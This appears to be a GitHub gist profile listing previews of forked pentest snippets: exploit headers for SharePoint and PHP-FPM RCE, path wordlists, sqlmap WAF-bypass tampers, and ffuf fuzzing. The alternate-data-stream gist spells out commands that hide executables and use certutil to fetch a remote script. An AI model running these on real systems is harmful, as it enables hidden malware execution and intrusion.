Skip to content

Instantly share code, notes, and snippets.

View JackPot777's full-sized avatar

JackPot777 JackPot777

5 followers · 7 following
View GitHub Profile
@JackPot777
JackPot777 / gist:0906ea818a007418f6154f4190bb20a7
Created January 17, 2024 23:10 — forked from Bo0oM/gist:5d18e56847d2b1722bf5eedea853119b
Bitrix urls
This file has been truncated, but you can view the full file.
rss.php
coupon_activation.php
tools/bizproc_wf_settings.php
tools/seo_yandex.php
tools/seo_google.php
tools/get_catalog_menu.php
tools/sale_farm_check_print.php
tools/vote/uf.php
tools/vote/vote_chart.php
@JackPot777
JackPot777 / SharePwn_public.py
Created January 17, 2024 22:20 — forked from testanull/SharePwn_public.py
SharePoint Pre-Auth Code Injection RCE chain CVE-2023-29357 & CVE-2023-24955 PoC
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
@JackPot777
JackPot777 / ExploitDB.txt
Created October 17, 2023 21:54 — forked from vijay922/ExploitDB.txt
frs/admin/qrs.php
__admin
__cache/
__index.php
__MACOSX
__pma___
__SQL
__test.php
_.htpasswd
_adm
@JackPot777
JackPot777 / CVE-2020-13483
Created March 22, 2023 15:48 — forked from mariuszpoplwski/CVE-2020-13483
https://gist.github.com/mariuszpoplawski/44c5dd8ca1c40ebbacd119505254195e
CVE-2020-13483
------------------------------------------
The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via
the items[ITEMS][ID] parameter to the
components/bitrix/mobileapp.list/ajax.php/ URI.
@JackPot777
JackPot777 / fingerprint.js
Created September 5, 2022 13:38 — forked from nikitastupin/fingerprint.js
fingerprint.js
(() => {
let gadgets = [];
if (typeof _satellite !== 'undefined') {
gadgets.push('Adobe Dynamic Tag Management');
}
if (typeof BOOMR !== 'undefined') {
gadgets.push('Akamai Boomerang');
}
@JackPot777
JackPot777 / fpm.py
Created August 23, 2022 18:53 — forked from phith0n/fpm.py
Fastcgi PHP-FPM Client && Code Execution
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
@JackPot777
JackPot777 / Exe_ADS_Methods.md
Created May 2, 2022 09:42 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@JackPot777
JackPot777 / sqlmapTamperScripts.md
Created November 9, 2021 21:33 — forked from castexyz/sqlmapTamperScripts.md
Sqlmap TamperScripts

SQLMAP Tamper Scripts

credits: https://medium.com/@drag0n/sqlmap-tamper-scripts-sql-injection-and-waf-bypass-c5a3f5764cb3

General Tamper testing:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

@JackPot777
JackPot777 / Dockerfile
Created March 6, 2021 12:32 — forked from InsiderPhD/Dockerfile
Arjun Docker
FROM python:3
WORKDIR /usr/src/app
COPY requirements.txt ./
RUN pip install --no-cache-dir -r requirements.txt
RUN mkdir data
COPY . .
@JackPot777
JackPot777 / ffuf_oneline.sh
Created March 6, 2021 12:32 — forked from InsiderPhD/ffuf_oneline.sh
# Basic Usage
ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080
# Basic Usage With a Cookie
ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 -b "laravel_session=eyJpdiI6Ii8wQU11dTVlUkg2alRHUXBIVzlGSnc9PSIsInZhbHVlIjoiOWs3YllJWTdqNC9xa1pMeFRvMFh0OE1vRFpaWm9GSzFkRktVZS9yUHBDM0lIazZ4K0NsbndxWVIxQ05VZWhqZUZaR0RGQWlFdmdDc24yWllYRklGSXI5STd2b05Pam4yRXIwV1BUWkZhUnFLNUFzOWsycmRHcnlxS0FqRWNsSnEiLCJtYWMiOiI3ZTliMmM2YzIxOTExNDE0NmVjYTYyMGI4Nzg4YzJiYjNmNjVkNDI1YzEyODYwMzY5YzczNzY3NTUwZDk0OGYzIn0%3D;"
# Adding a delay
ffuf -w wordlist.txt -u http://127.0.0.1:8000/api/FUZZ/6 -o output.txt -replay-proxy http://127.0.0.1:8080 –p 1 –t 3
# Adding a delay (new method)